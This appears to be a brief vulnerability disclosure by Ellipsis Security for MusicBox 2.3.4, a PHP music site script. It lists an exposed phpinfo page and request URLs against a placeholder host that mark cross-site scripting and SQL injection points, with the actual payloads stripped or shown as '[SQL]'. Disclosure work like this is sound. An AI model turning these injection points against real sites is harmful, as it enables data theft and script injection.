MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting (XSS) -------------------------- http://www.target.xx/?id=>&page=0 http://www.target.xx/index.php?id=>&page=0 http://www.target.xx/index.php?term=&in=song&action=search&start=0 http://www.target.xx/index.php?action=top&show=5&type= http://www.target.xx/index.php?action=top&show=&type=Artists ------------- SQL injection ------------- http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL] http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL] ----------------- Ellipsis Security http://www.ellsec.org